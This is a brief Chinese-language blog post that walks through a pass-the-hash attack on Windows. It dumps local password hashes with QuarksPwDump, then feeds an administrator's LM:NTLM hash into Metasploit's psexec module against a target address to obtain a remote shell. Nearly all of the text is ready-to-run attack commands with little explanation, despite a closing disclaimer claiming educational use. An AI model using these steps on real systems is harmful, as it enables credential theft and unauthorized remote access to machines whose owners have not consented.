一、利用QuarksPwDump获取hash值
quarkspwdump --dump-hash-local --output 1.txt
二、利用msf远程登录
1、选择攻击模块
use exploit/windows/smb/psexec
2、设置相关参数
set rhosts 192.168.139.129
set smbuser administrator
set smbpass AAD3B435B51404EEAAD3B435B51404EE:AE15921C10DC81E86C2BFFED52D24A8F
3、run,运行
4、获取shell,如果有乱码使用chcp 65001解决
获取更多资讯请加入交流群
版权说明
本文地址:http://kirinbk.cn/post-542.html
免责声明:本站文章仅用于科普及教育用途,远离犯罪!
发表评论